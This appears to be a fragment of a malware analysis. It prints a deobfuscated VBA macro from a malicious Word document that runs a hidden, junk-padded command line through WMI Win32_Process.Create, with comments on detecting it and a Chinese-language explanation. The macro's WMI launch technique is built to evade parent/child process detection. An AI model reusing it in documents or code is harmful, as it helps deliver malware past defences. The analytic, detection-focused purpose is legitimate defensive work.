Set ProcessObjectInstance = CreateObject("winmgmts:win32_process")
' Drop the first four characters; the remainder is the junk-padded command line.
ObfuscatedCommandLine = Mid(ObfuscatedCommandLineWithPrefix, 5)
' Win32_Process.Create launches the command line via WMI. Detection note: a process
' started this way is typically parented by the WMI provider host rather than the
' office application, so parent/child rules keyed on the office process alone may
' miss it; WMI process-creation telemetry is the place to look.
ProcessObjectInstance.Create WrapperForRemoveBogusQqFromString(ObfuscatedCommandLine), "", ""
End Function
这需要一个存储在名为 T6dwlv_ivpoiq2 的 Word 对象中的混淆命令行(我假设 ThisDocument 已被重命名为那个名字),并通过 Win32_Process::Create 运行它。